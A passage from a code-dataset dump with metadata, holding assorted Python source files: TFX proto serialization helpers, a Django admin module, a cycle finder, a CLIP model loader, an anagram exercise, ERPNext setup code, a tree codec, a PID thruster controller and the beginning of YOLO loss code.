execution_info_proto = execution_invocation_pb2.ExecutionInvocation.FromString(\n base64.urlsafe_b64decode(execution_info_b64))\n return data_types.ExecutionInfo.from_proto(execution_info_proto)\n\n\ndef deserialize_mlmd_connection_config(\n mlmd_connection_config_b64: str) -> metadata.ConnectionConfigType:\n \"\"\"De-serializes an MLMD connection config from base64 flag.\"\"\"\n mlmd_connection_config = (\n metadata_pb2.MLMDConnectionConfig.FromString(\n base64.b64decode(mlmd_connection_config_b64)))\n return getattr(mlmd_connection_config,\n mlmd_connection_config.WhichOneof('connection_config'))\n\n\ndef deserialize_executable_spec(\n executable_spec_b64: str,\n with_beam: bool = False,\n) -> Union[executable_spec_pb2.PythonClassExecutableSpec,\n executable_spec_pb2.BeamExecutableSpec]:\n \"\"\"De-serializes an executable spec from base64 flag.\"\"\"\n if with_beam:\n return executable_spec_pb2.BeamExecutableSpec.FromString(\n base64.b64decode(executable_spec_b64))\n return executable_spec_pb2.PythonClassExecutableSpec.FromString(\n base64.b64decode(executable_spec_b64))\n\n\ndef serialize_mlmd_connection_config(\n connection_config: metadata.ConnectionConfigType) -> str:\n \"\"\"Serializes an MLMD connection config into a base64 flag of its wrapper.\"\"\"\n mlmd_wrapper = metadata_pb2.MLMDConnectionConfig()\n for name, descriptor in (\n metadata_pb2.MLMDConnectionConfig.DESCRIPTOR.fields_by_name.items()):\n if descriptor.message_type.full_name == connection_config.DESCRIPTOR.full_name:\n getattr(mlmd_wrapper, name).CopyFrom(connection_config)\n break\n return base64.b64encode(mlmd_wrapper.SerializeToString()).decode('ascii')\n\n\ndef serialize_executable_spec(\n executable_spec: 
Union[executable_spec_pb2.PythonClassExecutableSpec,\n executable_spec_pb2.BeamExecutableSpec]\n) -> str:\n \"\"\"Serializes an executable spec into a base64 flag.\"\"\"\n return base64.b64encode(executable_spec.SerializeToString()).decode('ascii')\n\n\ndef serialize_execution_info(execution_info: data_types.ExecutionInfo) -> str:\n \"\"\"Serializes the ExecutionInfo class from a base64 flag.\"\"\"\n execution_info_proto = execution_info.to_proto()\n return base64.b64encode(\n execution_info_proto.SerializeToString()).decode('ascii')\n","repo_name":"xjdlb/my-awesome-tensorlfow-tutorial","sub_path":"tfx-master/tfx/orchestration/python_execution_binary/python_execution_binary_utils.py","file_name":"python_execution_binary_utils.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"8313180686","text":"from django.contrib import admin\nfrom .models import Project, Result, DuplicateTitle, DuplicateDescription,\\\n MissingH1, MissingCanonical, MissingTitle, MissingViewPort,\\\n MissingDescription, LowMeta, LowTitle, DuplicateH1, CrawlingStatistic, \\\n AuditStatistic, Article, ArticleContent\n\n# Register your models here.\n\nclass DuplicateTitleAdmin(admin.TabularInline):\n model = DuplicateTitle\n fields = ('titles',)\n\nclass DuplicateH1Admin(admin.TabularInline):\n model = DuplicateH1\n fields = ('titles',)\n\nclass DuplicateDescriptionAdmin(admin.TabularInline):\n model = DuplicateDescription\n fields = ('titles',)\n\nclass MissingH1Admin(admin.TabularInline):\n model = MissingH1\n fields = ('title',)\n\nclass MissingTitleAdmin(admin.TabularInline):\n model = MissingTitle\n fields = ('title',)\n\n\nclass MissingDescriptionAdmin(admin.TabularInline):\n model = MissingDescription\n fields = ('title',)\n\nclass MissingCanonicalAdmin(admin.TabularInline):\n model = MissingCanonical\n fields = ('title',)\n\n\nclass MissingDescriptionAdmin(admin.TabularInline):\n model = MissingDescription\n fields = ('title',)\n\nclass MissingViewPortAdmin(admin.TabularInline):\n model = MissingViewPort\n fields = ('title',)\n\nclass LowTitleAdmin(admin.TabularInline):\n model = LowTitle\n fields = ('title',)\n\n\nclass LowMetaAdmin(admin.TabularInline):\n model = LowMeta\n fields = ('title',)\n\n\nclass CrawlingStatisticAdmin(admin.TabularInline):\n model = CrawlingStatistic\n fields = ('date',)\n\n\nclass AuditStatisticAdmin(admin.TabularInline):\n model = AuditStatistic\n fields = ('date',)\n \n@admin.register(Result)\nclass ResultsAdmin(admin.ModelAdmin):\n list_display = ('project', 'created_at', 'updated_at')\n inlines = [DuplicateTitleAdmin, DuplicateDescriptionAdmin, MissingH1Admin, MissingTitleAdmin,\n MissingDescriptionAdmin, MissingCanonicalAdmin, MissingViewPortAdmin, LowMetaAdmin, LowTitleAdmin,\n DuplicateH1Admin\n ]\n \n\n@admin.register(Project)\nclass ProjectsAdmin(admin.ModelAdmin):\n list_display = ('user', 'name', 'homepage', 'created_at')\n ordering = ('-created_at',)\n inlines = [CrawlingStatisticAdmin, AuditStatisticAdmin]\n \n\n\nclass ArticleContentAdmin(admin.TabularInline):\n model = ArticleContent\n fields = ('title','content',)\n \n\n@admin.register(Article)\nclass ArticleAdmin(admin.ModelAdmin):\n list_display = ['title']\n inlines = [ArticleContentAdmin, 
]\n\n\n\n\n\n\n","repo_name":"obiemmanuel2018/seo-analyzer-backend","sub_path":"spider/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40506067727","text":"import enum\nfrom typing import TypeVar, Generic, Dict, Optional\n\nT = TypeVar('T')\n\n\nclass CycleStatus(enum.Enum):\n UNKNOWN = enum.auto()\n TESTING = enum.auto()\n FOUND = enum.auto()\n\n\nclass CycleFinder(Generic[T]):\n def __init__(self, wait_at_least=None, needs_repeated=1):\n self._cache: Dict[int, T] = {}\n self._last_seen_index: Dict[T, int] = {}\n self._cycle_status: CycleStatus = CycleStatus.UNKNOWN\n self._cycle_start: Optional[int] = None\n self._cycle_end: Optional[int] = None\n self._testing_index: Optional[int] = None\n\n self._wait_at_least: Optional[int] = wait_at_least\n self._repeat_count = 0\n self._needs_repeated: int = needs_repeated\n\n @property\n def cycle_found(self) -> bool:\n return self._cycle_status == CycleStatus.FOUND\n\n @property\n def cycle_start(self) -> Optional[int]:\n if not self.cycle_found:\n return None\n return self._cycle_start\n\n @property\n def cycle_size(self) -> Optional[int]:\n if not self.cycle_found:\n return None\n return self._cycle_end - self._cycle_start + 1\n\n def __setitem__(self, index: int, value: T):\n if self._cycle_status == CycleStatus.FOUND:\n return\n\n last_seen_index = self._last_seen_index[value] if value in self._last_seen_index else None\n\n self._last_seen_index[value] = index\n self._cache[index] = value\n\n if last_seen_index is None:\n self._reset() # Can't be in a cycle if this is a new number\n return\n\n if self._wait_at_least is not None and index < self._wait_at_least:\n return\n\n if self._cycle_status == CycleStatus.UNKNOWN:\n self._repeat_count = 0\n self._cycle_start = last_seen_index\n self._testing_index = last_seen_index\n self._cycle_end = index - 1\n self._cycle_status = CycleStatus.TESTING\n elif self._cycle_status == CycleStatus.TESTING:\n self._testing_index += 1\n if self._cache[self._testing_index] != value: # We've broken the cycle\n self._reset()\n return\n\n if self._cycle_end == self._testing_index:\n self._repeat_count += 1\n if self._repeat_count == self._needs_repeated:\n self._cycle_status = CycleStatus.FOUND\n return\n else:\n cycle_size = self._cycle_end - self._cycle_start + 1\n self._cycle_start += cycle_size\n self._cycle_end += cycle_size\n\n def _reset(self):\n self._cycle_status = CycleStatus.UNKNOWN\n self._testing_index = None\n self._cycle_start = None\n self._cycle_end = None\n self._repeat_count = 0\n","repo_name":"Jnesselr/AdventOfCode","sub_path":"aoc/util/cycle_finder.py","file_name":"cycle_finder.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19740765966","text":"import time\r\nimport typing\r\nfrom pathlib import Path\r\n\r\nimport clip\r\nimport open_clip\r\nimport torch\r\nfrom loguru import logger\r\nfrom typing_extensions import override\r\n\r\nfrom hordelib.config_path import get_hordelib_path\r\nfrom hordelib.consts import MODEL_CATEGORY_NAMES, MODEL_DB_NAMES\r\nfrom hordelib.model_manager.base import BaseModelManager\r\n\r\n\r\nclass ClipModelManager(BaseModelManager):\r\n def __init__(self, download_reference=False):\r\n super().__init__(\r\n models_db_name=MODEL_DB_NAMES[MODEL_CATEGORY_NAMES.clip],\r\n download_reference=download_reference,\r\n )\r\n\r\n def 
load_ranking_lists(self):\r\n ranking_lists = {}\r\n ranking_lists_path = Path(get_hordelib_path()).joinpath(\r\n \"clip/\",\r\n \"ranking_lists/\",\r\n )\r\n for file in ranking_lists_path.glob(\"*.txt\"):\r\n ranking_lists[file.stem] = load_list(file)\r\n return ranking_lists\r\n\r\n def load_coca(self, model_name, half_precision=True, gpu_id=0, cpu_only=False):\r\n model_path = self.get_model_files(model_name)[0][\"path\"]\r\n model_path = f\"{self.modelFolderPath}/{model_path}\"\r\n if cpu_only:\r\n device = torch.device(\"cpu\")\r\n half_precision = False\r\n else:\r\n device = torch.device(f\"cuda:{gpu_id}\" if self.cuda_available else \"cpu\")\r\n model, _, transform = open_clip.create_model_and_transforms(\r\n \"coca_ViT-L-14\",\r\n pretrained=model_path,\r\n device=device,\r\n precision=\"fp16\" if half_precision else \"fp32\",\r\n )\r\n model = model.eval()\r\n model.to(device)\r\n if half_precision:\r\n model = model.half()\r\n return {\r\n \"model\": model,\r\n \"device\": device,\r\n \"transform\": transform,\r\n \"half_precision\": half_precision,\r\n \"cache_name\": model_name.replace(\"/\", \"_\"),\r\n }\r\n\r\n def load_open_clip(self, model_name, half_precision=True, gpu_id=0, cpu_only=False):\r\n pretrained = self.get_model(model_name)[\"pretrained_name\"]\r\n if cpu_only:\r\n device = torch.device(\"cpu\")\r\n half_precision = False\r\n else:\r\n device = torch.device(f\"cuda:{gpu_id}\" if self.cuda_available else \"cpu\")\r\n model, _, preprocess = open_clip.create_model_and_transforms(\r\n model_name,\r\n pretrained=pretrained,\r\n cache_dir=self.modelFolderPath,\r\n device=device,\r\n precision=\"fp16\" if half_precision else \"fp32\",\r\n )\r\n model = model.eval()\r\n model.to(device)\r\n if half_precision:\r\n model = model.half()\r\n ranking_lists = self.load_ranking_lists()\r\n return {\r\n \"model\": model,\r\n \"device\": device,\r\n \"preprocess\": preprocess,\r\n \"ranking_lists\": ranking_lists,\r\n \"half_precision\": half_precision,\r\n \"cache_name\": model_name.replace(\"/\", \"_\"),\r\n }\r\n\r\n def load_clip(self, model_name, half_precision=True, gpu_id=0, cpu_only=False):\r\n if cpu_only:\r\n device = torch.device(\"cpu\")\r\n half_precision = False\r\n else:\r\n device = torch.device(f\"cuda:{gpu_id}\" if self.cuda_available else \"cpu\")\r\n model, preprocess = clip.load(\r\n model_name,\r\n device=device,\r\n download_root=self.modelFolderPath,\r\n )\r\n model = model.eval()\r\n if half_precision:\r\n model = model.half()\r\n ranking_lists = self.load_ranking_lists()\r\n return {\r\n \"model\": model,\r\n \"device\": device,\r\n \"preprocess\": preprocess,\r\n \"ranking_lists\": ranking_lists,\r\n \"half_precision\": half_precision,\r\n \"cache_name\": model_name.replace(\"/\", \"_\"),\r\n }\r\n\r\n @override\r\n def modelToRam(\r\n self,\r\n model_name: str,\r\n half_precision=True,\r\n gpu_id=0,\r\n cpu_only=False,\r\n **kwargs,\r\n ) -> dict[str, typing.Any]:\r\n \"\"\"\r\n model_name: str. Name of the model to load. See available_models for a list of available models.\r\n half_precision: bool. If True, the model will be loaded in half precision.\r\n gpu_id: int. The id of the gpu to use. If the gpu is not available, the model will be loaded on the cpu.\r\n cpu_only: bool. If True, the model will be loaded on the cpu. 
If True, half_precision will be set to False.\r\n        \"\"\"\r\n        loaded_model_info = None\r\n        if not self.cuda_available:\r\n            cpu_only = True\r\n        tic = time.time()\r\n        logger.init(f\"{model_name}\", status=\"Loading\")  # logger.init\r\n        if self.model_reference[model_name][\"type\"] == \"open_clip\":\r\n            loaded_model_info = self.load_open_clip(\r\n                model_name,\r\n                half_precision,\r\n                gpu_id,\r\n                cpu_only,\r\n            )\r\n            self.add_loaded_model(model_name, loaded_model_info)\r\n        elif self.model_reference[model_name][\"type\"] == \"clip\":\r\n            loaded_model_info = self.load_clip(\r\n                model_name,\r\n                half_precision,\r\n                gpu_id,\r\n                cpu_only,\r\n            )\r\n            self.add_loaded_model(model_name, loaded_model_info)\r\n        elif self.model_reference[model_name][\"type\"] == \"coca\":\r\n            loaded_model_info = self.load_coca(\r\n                model_name,\r\n                half_precision,\r\n                gpu_id,\r\n                cpu_only,\r\n            )\r\n            self.add_loaded_model(model_name, loaded_model_info)\r\n        else:\r\n            logger.error(\r\n                f\"Unknown model type: {self.model_reference[model_name]['type']}\",\r\n            )\r\n            return {}  # XXX # FIXME\r\n        if not loaded_model_info:\r\n            logger.init_err(f\"Failed to load {model_name}\", status=\"Error\")\r\n            return {}  # XXX # FIXME\r\n\r\n        logger.init_ok(f\"Loading {model_name}\", status=\"Success\")  # logger.init_ok\r\n        toc = time.time()\r\n        logger.init_ok(\r\n            f\"Loading {model_name}: Took {toc-tic} seconds\",\r\n            status=\"Success\",\r\n        )  # logger.init_ok\r\n        return loaded_model_info\r\n\r\n\r\ndef load_list(filename):\r\n    with open(filename, encoding=\"utf-8\", errors=\"replace\") as f:\r\n        return [line.strip() for line in f.readlines()]\r\n","repo_name":"Haidra-Org/hordelib_old","sub_path":"hordelib/model_manager/clip.py","file_name":"clip.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"}
{"seq_id":"32378418252","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\nAnagram Problem\n\nDependencies:\ncollections for Counter comparison\n'''\n\nfrom collections import Counter\nimport argparse\n\ndef detect_anagrams(orig, testcases):\n    '''Determine if a set of solutions are anagrams to a given string'''\n    build = []\n    for testcase in testcases:\n        if Counter(orig.lower()) == Counter(testcase.lower()) \\\n            and orig.lower() != testcase.lower():\n            build.append(testcase)\n    return build\n\ndef main():\n    '''Main wrapper'''\n    parser = argparse.ArgumentParser()\n    parser.add_argument('word', help='original word to test against')\n    parser.add_argument('wlist', help='space separated string of words to test')\n    args = parser.parse_args()\n    for anagram in detect_anagrams(args.word, args.wlist.split()):\n        print(anagram)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"SodiumIodide/Exercism","sub_path":"python/anagram/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"38146391569","text":"import frappe\nfrom frappe import _\nfrom frappe.utils import cstr, getdate\nfrom .default_website import website_maker\n\n\ndef create_fiscal_year_and_company(args):\n\tif args.get(\"fy_start_date\"):\n\t\tcurr_fiscal_year = get_fy_details(args.get(\"fy_start_date\"), args.get(\"fy_end_date\"))\n\t\tfrappe.get_doc(\n\t\t\t{\n\t\t\t\t\"doctype\": \"Fiscal Year\",\n\t\t\t\t\"year\": curr_fiscal_year,\n\t\t\t\t\"year_start_date\": args.get(\"fy_start_date\"),\n\t\t\t\t\"year_end_date\": 
args.get(\"fy_end_date\"),\n\t\t\t}\n\t\t).insert()\n\n\tif args.get(\"company_name\"):\n\t\tfrappe.get_doc(\n\t\t\t{\n\t\t\t\t\"doctype\": \"Company\",\n\t\t\t\t\"company_name\": args.get(\"company_name\"),\n\t\t\t\t\"enable_perpetual_inventory\": 1,\n\t\t\t\t\"abbr\": args.get(\"company_abbr\"),\n\t\t\t\t\"default_currency\": args.get(\"currency\"),\n\t\t\t\t\"country\": args.get(\"country\"),\n\t\t\t\t\"create_chart_of_accounts_based_on\": \"Standard Template\",\n\t\t\t\t\"chart_of_accounts\": args.get(\"chart_of_accounts\"),\n\t\t\t}\n\t\t).insert()\n\n\ndef enable_shopping_cart(args): # nosemgrep\n\t# Needs price_lists\n\tfrappe.get_doc(\n\t\t{\n\t\t\t\"doctype\": \"E Commerce Settings\",\n\t\t\t\"enabled\": 1,\n\t\t\t\"company\": args.get(\"company_name\"),\n\t\t\t\"price_list\": frappe.db.get_value(\"Price List\", {\"selling\": 1}),\n\t\t\t\"default_customer_group\": _(\"Individual\"),\n\t\t\t\"quotation_series\": \"QTN-\",\n\t\t}\n\t).insert()\n\n\ndef create_email_digest():\n\tfrom frappe.utils.user import get_system_managers\n\n\tsystem_managers = get_system_managers(only_name=True)\n\n\tif not system_managers:\n\t\treturn\n\n\trecipients = []\n\tfor d in system_managers:\n\t\trecipients.append({\"recipient\": d})\n\n\tcompanies = frappe.db.sql_list(\"select name FROM `tabCompany`\")\n\tfor company in companies:\n\t\tif not frappe.db.exists(\"Email Digest\", \"Default Weekly Digest - \" + company):\n\t\t\tedigest = frappe.get_doc(\n\t\t\t\t{\n\t\t\t\t\t\"doctype\": \"Email Digest\",\n\t\t\t\t\t\"name\": \"Default Weekly Digest - \" + company,\n\t\t\t\t\t\"company\": company,\n\t\t\t\t\t\"frequency\": \"Weekly\",\n\t\t\t\t\t\"recipients\": recipients,\n\t\t\t\t}\n\t\t\t)\n\n\t\t\tfor df in edigest.meta.get(\"fields\", {\"fieldtype\": \"Check\"}):\n\t\t\t\tif df.fieldname != \"scheduler_errors\":\n\t\t\t\t\tedigest.set(df.fieldname, 1)\n\n\t\t\tedigest.insert()\n\n\t# scheduler errors digest\n\tif companies:\n\t\tedigest = frappe.new_doc(\"Email Digest\")\n\t\tedigest.update(\n\t\t\t{\n\t\t\t\t\"name\": \"Scheduler Errors\",\n\t\t\t\t\"company\": companies[0],\n\t\t\t\t\"frequency\": \"Daily\",\n\t\t\t\t\"recipients\": recipients,\n\t\t\t\t\"scheduler_errors\": 1,\n\t\t\t\t\"enabled\": 1,\n\t\t\t}\n\t\t)\n\t\tedigest.insert()\n\n\ndef create_logo(args):\n\tif args.get(\"attach_logo\"):\n\t\tattach_logo = args.get(\"attach_logo\").split(\",\")\n\t\tif len(attach_logo) == 3:\n\t\t\tfilename, filetype, content = attach_logo\n\t\t\t_file = frappe.get_doc(\n\t\t\t\t{\n\t\t\t\t\t\"doctype\": \"File\",\n\t\t\t\t\t\"file_name\": filename,\n\t\t\t\t\t\"attached_to_doctype\": \"Website Settings\",\n\t\t\t\t\t\"attached_to_name\": \"Website Settings\",\n\t\t\t\t\t\"decode\": True,\n\t\t\t\t}\n\t\t\t)\n\t\t\t_file.save()\n\t\t\tfileurl = _file.file_url\n\t\t\tfrappe.db.set_value(\n\t\t\t\t\"Website Settings\",\n\t\t\t\t\"Website Settings\",\n\t\t\t\t\"brand_html\",\n\t\t\t\t\" {1}\".format(\n\t\t\t\t\tfileurl, args.get(\"company_name\")\n\t\t\t\t),\n\t\t\t)\n\n\ndef create_website(args):\n\twebsite_maker(args)\n\n\ndef get_fy_details(fy_start_date, fy_end_date):\n\tstart_year = getdate(fy_start_date).year\n\tif start_year == getdate(fy_end_date).year:\n\t\tfy = cstr(start_year)\n\telse:\n\t\tfy = cstr(start_year) + \"-\" + cstr(start_year + 1)\n\treturn 
fy\n","repo_name":"RafMo20D/erpnext-ksa-op","sub_path":"erpnext/setup/setup_wizard/operations/company_setup.py","file_name":"company_setup.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"2988476240","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Codec:\n \"\"\"\n 一棵树的下边缘是被None值包裹着的。\n \"\"\"\n def serialize(self, root: TreeNode):\n \"\"\"Encodes a tree to a single string.\n :type root: TreeNode\n :rtype: str, 官渡优先搜索,每个节点值��用空格隔开;\n \"\"\"\n res = \"\"\n queue = [root]\n while queue:\n node = queue.pop(0)\n if node:\n res += str(node.val)\n queue.append(node.left)\n queue.append(node.right)\n else:\n res += \"n\"\n res += \" \"\n return res\n\n def deserialize(self, data: str):\n \"\"\"Decodes your encoded data to tree.\n :type data: str\n :rtype: TreeNode\n \"\"\"\n tree = data.split()\n if tree[0] == 'n':\n return None\n root = TreeNode(int(tree[0]))\n queue = [root]\n i = 1\n while queue:\n root = queue.pop(0)\n if root is None:# 相当于剪枝操作,对于已经为None的节点,不再继续处理其子节点\n continue\n root.left = TreeNode(int(tree[i])) if tree[i]!=\"n\" else None\n root.right = TreeNode(int(tree[i+1])) if tree[i+1]!=\"n\" else None\n i += 2\n queue.append(root.left)\n queue.append(root.right)\n return root\n\ndef printNode(root: TreeNode):\n queue = [root]\n while queue:\n node = queue.pop(0)\n print(node.val)\n if node.left: queue.append(node.left)\n if node.right: queue.append(node.right)\n\n# Your Codec object will be instantiated and called as such:\ncodec = Codec()\nroot = TreeNode(-1)\nroot.left = TreeNode(0)\nret = codec.deserialize(codec.serialize(root))\nprintNode(ret)\n","repo_name":"Transi-ent/LeetcodeSolver","sub_path":"297.py","file_name":"297.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4475131636","text":"import matplotlib.pyplot as plt\nimport time\nfrom datetime import datetime\n\nfrom utilities import clear_file, write_to_file, get_pos, set_thrust, scale_u\n\n\n# The PID controller\ndef PID(kp, ki, kd, timeout, dt, r, rc, ch):\n \n # sets the start deviation \n # This also needed to be changed, when the setup was changed, 06.05.2022\n e_prev = -r + get_pos(ch) # e = r - y\n e_sum = 0\n e = e_prev\n\n # All the files i need to save data\n files = [\"textfiles/pos.txt\",\"textfiles/ref.txt\",\"textfiles/P.txt\",\"textfiles/I.txt\",\"textfiles/D.txt\"]\n\n # Clear all the files\n for file in files:\n clear_file(file)\n\n sleep = 0.20 # the sleep time of the while loop\n timeout_start = time.time()\n\n # The loop runs until the time reaches timeout\n while time.time() < timeout_start + timeout: \n # the current time from the loop started\n now_time = time.time()-timeout_start \n # Changes the reference at mid time. 
Used to test the system's strength\r\n        # if ((timeout/2) - sleep/2) < now_time < ((timeout/2) + sleep/2):\r\n        #     r -= 0.04\r\n\r\n        e_prev = e # e_prev is set to the error from the last time through the loop \r\n        # get a new error\r\n        # This also needed to be changed when the setup was changed, 06.05.2022 \r\n        e = -r + get_pos(ch) \r\n\r\n        # Proportional part\r\n        P = kp*e\r\n\r\n        # Integrator part, sums the errors\r\n        e_sum = e_sum + e * dt\r\n        I = ki * e_sum\r\n        # Need to make sure the integral term doesn't get too big or too small\r\n        if I > 90:\r\n            e_sum = 90/ki\r\n        elif I < -90:\r\n            e_sum = -90/(ki)\r\n        \r\n\r\n        # Derivative part\r\n        dedt = (e - e_prev)/dt\r\n        D = kd * dedt\r\n        \r\n\r\n        \r\n        # Needs to add 90 because this is the angle where the thrust is zero\r\n        u = P + I + D + 90 \r\n        # Scales the thrust to be within the working range, else it's zero \r\n        new_u = scale_u(u)\r\n        # Apply thrust \r\n        set_thrust(rc,new_u)\r\n\r\n\r\n        # Write the position and reference to file\r\n        write_to_file(files[0],now_time,get_pos(ch))\r\n        write_to_file(files[1],now_time,r)\r\n\r\n\r\n        # write the PID values to file\r\n        write_to_file(files[2],now_time,P)\r\n        write_to_file(files[3],now_time,I)\r\n        write_to_file(files[4],now_time,D)\r\n\r\n\r\n        # Sleep the loop to make it run approximately every 0.25 seconds, \r\n        # because that is when the voltage is also updated\r\n        time.sleep(sleep)\r\n    \r\n    # Stops the thrust applied when the loop is finished\r\n    rc.setEngaged(False)\r\n\r\n\r\n\r\n\r\n","repo_name":"petterhangerhagen/TMR4345-Marin-Datalab","sub_path":"Code/PID.py","file_name":"PID.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"36064977073","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nfrom ppdet.core.workspace import register\n\nfrom ..bbox_utils import decode_yolo, xywh2xyxy, batch_iou_similarity, bbox_iou\n\n__all__ = ['YOLOv3Loss', 'YOLOv5Loss']\n\n\ndef bbox_transform(pbox, anchor, downsample):\n    pbox = decode_yolo(pbox, anchor, downsample)\n    pbox = xywh2xyxy(pbox)\n    return pbox\n\n\n@register\nclass YOLOv3Loss(nn.Layer):\n\n    __inject__ = ['iou_loss', 'iou_aware_loss']\n    __shared__ = ['num_classes']\n\n    def __init__(self,\n                 num_classes=80,\n                 ignore_thresh=0.7,\n                 label_smooth=False,\n                 downsample=[32, 16, 8],\n                 scale_x_y=1.,\n                 iou_loss=None,\n                 iou_aware_loss=None):\n        \"\"\"\n        YOLOv3Loss layer\n\n        Args:\n            num_classes (int): number of foreground classes\n            ignore_thresh (float): threshold to ignore confidence loss\n            label_smooth (bool): whether to use label smoothing\n            downsample (list): downsample ratio for each detection block\n            scale_x_y (float): scale_x_y factor\n            iou_loss (object): IoULoss instance\n            iou_aware_loss (object): IouAwareLoss instance \n        \"\"\"\n        super(YOLOv3Loss, self).__init__()\n        self.num_classes = num_classes\n        self.ignore_thresh = ignore_thresh\n        self.label_smooth = label_smooth\n        self.downsample = downsample\n        self.scale_x_y = scale_x_y\n        self.iou_loss = iou_loss\n        self.iou_aware_loss = iou_aware_loss\n        self.distill_pairs = []\n\n    def obj_loss(self, pbox, gbox, pobj, tobj, anchor, downsample):\n        # pbox\n        pbox = decode_yolo(pbox, anchor, downsample)\n        pbox = xywh2xyxy(pbox)\n        pbox = paddle.concat(pbox, axis=-1)\n        b = pbox.shape[0]\n        pbox = pbox.reshape((b, -1, 4))\n        # gbox\n        gxy = gbox[:, :, 0:2] - gbox[:, :, 2:4] * 0.5\n        gwh = gbox[:, :, 0:2] + gbox[:, :, 2:4] * 0.5\n        gbox = paddle.concat([gxy, gwh], axis=-1)\n\n        iou = 
batch_iou_similarity(pbox, gbox)\n iou.stop_gradient = True\n iou_max = iou.max(2) # [N, M1]\n iou_mask = paddle.cast(iou_max <= self.ignore_thresh, dtype=pbox.dtype)\n iou_mask.stop_gradient = True\n\n pobj = pobj.reshape((b, -1))\n tobj = tobj.reshape((b, -1))\n obj_mask = paddle.cast(tobj > 0, dtype=pbox.dtype)\n obj_mask.stop_gradient = True\n\n loss_obj = F.binary_cross_entropy_with_logits(\n pobj, obj_mask, reduction='none')\n loss_obj_pos = (loss_obj * tobj)\n loss_obj_neg = (loss_obj * (1 - obj_mask) * iou_mask)\n return loss_obj_pos + loss_obj_neg\n\n def cls_loss(self, pcls, tcls):\n if self.label_smooth:\n delta = min(1. / self.num_classes, 1. / 40)\n pos, neg = 1 - delta, delta\n # 1 for positive, 0 for negative\n tcls = pos * paddle.cast(\n tcls > 0., dtype=tcls.dtype) + neg * paddle.cast(\n tcls <= 0., dtype=tcls.dtype)\n\n loss_cls = F.binary_cross_entropy_with_logits(\n pcls, tcls, reduction='none')\n return loss_cls\n\n def yolov3_loss(self, p, t, gt_box, anchor, downsample, scale=1.,\n eps=1e-10):\n na = len(anchor)\n b, c, h, w = p.shape\n if self.iou_aware_loss:\n ioup, p = p[:, 0:na, :, :], p[:, na:, :, :]\n ioup = ioup.unsqueeze(-1)\n p = p.reshape((b, na, -1, h, w)).transpose((0, 1, 3, 4, 2))\n x, y = p[:, :, :, :, 0:1], p[:, :, :, :, 1:2]\n w, h = p[:, :, :, :, 2:3], p[:, :, :, :, 3:4]\n obj, pcls = p[:, :, :, :, 4:5], p[:, :, :, :, 5:]\n self.distill_pairs.append([x, y, w, h, obj, pcls])\n\n t = t.transpose((0, 1, 3, 4, 2))\n tx, ty = t[:, :, :, :, 0:1], t[:, :, :, :, 1:2]\n tw, th = t[:, :, :, :, 2:3], t[:, :, :, :, 3:4]\n tscale = t[:, :, :, :, 4:5]\n tobj, tcls = t[:, :, :, :, 5:6], t[:, :, :, :, 6:]\n\n tscale_obj = tscale * tobj\n loss = dict()\n\n x = scale * F.sigmoid(x) - 0.5 * (scale - 1.)\n y = scale * F.sigmoid(y) - 0.5 * (scale - 1.)\n\n if abs(scale - 1.) 
< eps:\n loss_x = F.binary_cross_entropy(x, tx, reduction='none')\n loss_y = F.binary_cross_entropy(y, ty, reduction='none')\n loss_xy = tscale_obj * (loss_x + loss_y)\n else:\n loss_x = paddle.abs(x - tx)\n loss_y = paddle.abs(y - ty)\n loss_xy = tscale_obj * (loss_x + loss_y)\n\n loss_xy = loss_xy.sum([1, 2, 3, 4]).mean()\n\n loss_w = paddle.abs(w - tw)\n loss_h = paddle.abs(h - th)\n loss_wh = tscale_obj * (loss_w + loss_h)\n loss_wh = loss_wh.sum([1, 2, 3, 4]).mean()\n\n loss['loss_xy'] = loss_xy\n loss['loss_wh'] = loss_wh\n\n if self.iou_loss is not None:\n # warn: do not modify x, y, w, h in place\n box, tbox = [x, y, w, h], [tx, ty, tw, th]\n pbox = bbox_transform(box, anchor, downsample)\n gbox = bbox_transform(tbox, anchor, downsample)\n loss_iou = self.iou_loss(pbox, gbox)\n loss_iou = loss_iou * tscale_obj\n loss_iou = loss_iou.sum([1, 2, 3, 4]).mean()\n loss['loss_iou'] = loss_iou\n\n if self.iou_aware_loss is not None:\n box, tbox = [x, y, w, h], [tx, ty, tw, th]\n pbox = bbox_transform(box, anchor, downsample)\n gbox = bbox_transform(tbox, anchor, downsample)\n loss_iou_aware = self.iou_aware_loss(ioup, pbox, gbox)\n loss_iou_aware = loss_iou_aware * tobj\n loss_iou_aware = loss_iou_aware.sum([1, 2, 3, 4]).mean()\n loss['loss_iou_aware'] = loss_iou_aware\n\n box = [x, y, w, h]\n loss_obj = self.obj_loss(box, gt_box, obj, tobj, anchor, downsample)\n loss_obj = loss_obj.sum(-1).mean()\n loss['loss_obj'] = loss_obj\n loss_cls = self.cls_loss(pcls, tcls) * tobj\n loss_cls = loss_cls.sum([1, 2, 3, 4]).mean()\n loss['loss_cls'] = loss_cls\n return loss\n\n def forward(self, inputs, targets, anchors):\n np = len(inputs)\n 